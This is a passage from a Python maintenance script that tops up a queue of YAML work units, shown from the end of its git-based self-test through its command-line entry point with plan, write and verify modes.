        assert pl2["runnable_before"] == 3
        # hand-edit -> refused
        f = r / QUEUE / f"{pl['new_units'][0]['id']}.yaml"
        f.write_text(f.read_text().replace("status: queued", "status: queued   # hand-edited"), encoding="utf-8")
        git("commit", "-q", "-am", "edit")
        assert any("does not reproduce" in p for p in verify(r, "main")), verify(r, "main")
        # modified pre-existing unit -> refused
        git("checkout", "-q", "main")
        git("checkout", "-q", "-b", "edit2")
        (r / QUEUE / "RQ-20250101-001.yaml").write_text("id: RQ-20250101-001\nstatus: queued\n")
        git("add", "-A")
        git("commit", "-q", "-m", "pre")
        git("checkout", "-q", "main")
        git("merge", "-q", "edit2")
        git("checkout", "-q", "-b", "edit3")
        (r / QUEUE / "RQ-20250101-001.yaml").write_text("id: RQ-20250101-001\nstatus: done\n")
        git("commit", "-q", "-am", "flip")
        assert any("only ADDS" in p for p in verify(r, "main"))
    print("queue_replenish self-test OK")
    return 0


def main(argv: Optional[List[str]] = None) -> int:
    ap = argparse.ArgumentParser(description=__doc__.split("\n\n")[0])
    ap.add_argument("--self-test", action="store_true")
    ap.add_argument("--target", type=int, default=DEFAULT_TARGET, help="runnable units to keep queued")
    ap.add_argument("--date", default=None, help="YYYY-MM-DD for the new ids (default: today UTC)")
    ap.add_argument("--write", action="store_true", help="write the new unit files (default: plan only)")
    ap.add_argument("--verify", action="store_true", help="re-derive every unit this branch adds")
    ap.add_argument("--base", default="origin/main")
    ap.add_argument("--json", action="store_true")
    args = ap.parse_args(argv)
    # `--verify --base` grades a COMMIT RANGE, so the verdict is about the
    # committed tree. Say so when that is not the tree you edited
    # (tests/test_dirty_tree_notice.py; notice only, no exit-code change).
    sys.path.insert(0, str(_REPO / "scripts" / "ci"))
    import _dirty_tree  # noqa: E402,PLC0415 -- path shim above
    _dirty_tree.warn()
    if args.self_test:
        return _self_test()
    if args.verify:
        problems = verify(_REPO, args.base)
        for p in problems:
            print(f"::error::queue_replenish --verify: {p}")
        print("queue_replenish --verify: " + ("OK" if not problems else f"FAIL ({len(problems)})"))
        return 1 if problems else 0
    day = args.date or datetime.now(timezone.utc).date().isoformat()
    date.fromisoformat(day)
    pl = plan(_REPO, day=day, target=args.target)
    if args.write:
        for u in pl["new_units"]:
            (_REPO / QUEUE / f"{u['id']}.yaml").write_text(u["text"], encoding="utf-8")
    summary = {k: v for k, v in pl.items() if k != "new_units"}
    summary["new_units"] = [{"id": u["id"], "family": u["family"], "key": u["key"]} for u in pl["new_units"]]
    summary["written"] = bool(args.write)
    if args.json:
        print(json.dumps(summary, indent=2))
    else:
        print(f"queue_replenish: runnable {pl['runnable_before']} / target {pl['target']} -> deficit {pl['deficit']}; "
              f"candidates {pl['candidates']}; allocation {pl['allocation']}"
              + (f"; UNREADABLE units: {pl['unreadable']}" if pl["unreadable"] else ""))
        for u in summary["new_units"]:
            print(f"  {'WROTE' if args.write else 'would write'} {u['id']}  {u['family']:<20} {u['key']}")
    return 0


if __name__ == "__main__":  # pragma: no cover
    raise SystemExit(main())
